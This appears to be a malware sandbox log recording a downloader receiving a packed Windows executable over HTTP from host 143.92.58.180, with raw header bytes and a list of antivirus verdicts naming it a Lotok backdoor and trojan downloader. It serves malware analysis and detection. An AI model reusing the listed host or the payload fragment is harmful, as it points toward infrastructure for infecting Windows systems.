 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:35 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:36 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:37 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:38 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:39 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 844
1 1024 0
host 143.92.58.180
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Lotok.4!c
MicroWorld-eScan Gen:Variant.Doina.65070
Skyhigh BehavesLike.Win32.NetLoader.lh
ALYac Gen:Variant.Doina.65070
Cylance unsafe
VIPRE Gen:Variant.Doina.65070
CrowdStrike win/malicious_confidence_90% (W)
Alibaba Backdoor:Win32/Lotok.1d26da00
K7GW Trojan-Downloader ( 005ac8791 )
K7AntiVirus Trojan-Downloader ( 005ac8791 )
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDownloader.Agent.HHI
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Backdoor.Win32.Lotok.gen
BitDefender Gen:Variant.Doina.65070
Avast Win32:RATX-gen [Trj]
Tencent Trojan.Win32.Agent_yh.16001053
Emsisoft Gen:Variant.Doina.65070 (B)
F-Secure Trojan.TR/Dldr.Agent.otkvn
DrWeb Trojan.DownLoader46.24420
FireEye Generic.mg.dc62653f9e2468f5
Sophos Mal/Generic-S
Ikarus Trojan-Downloader.Win32.Agent
GData Gen:Variant.Doina.65070
Webroot W32.Trojan.Agent.Gen
Google Detected
Avira TR/Dldr.Agent.otkvn
Antiy-AVL Trojan[Backdoor]/Win32.Lotok
Arcabit Trojan.Doina.DFE2E
ZoneAlarm HEUR:Backdoor.Win32.Lotok.gen
Microsoft Trojan:Win32/Casdet!rfn
Varist W32/ABRisk.YRPR-3326
AhnLab-V3 Trojan/Win.Generic.C5509670
McAfee Artemis!DC62653F9E24
MAX malware (ai score=85)
VBA32 Backdoor.Farfli
Malwarebytes Trojan.Downloader
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_GEN.R002H09JE23
Rising Backdoor.Lotok!8.111D5 (TFE:5:JRMfPVkrx8T)
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.101018141.susgen
Fortinet W32/Agent.HHI!tr.dldr
BitDefenderTheta Gen:NN.ZedlaF.36738.eu4@aukuV8ki
AVG Win32:RATX-gen [Trj]
DeepInstinct MALICIOUS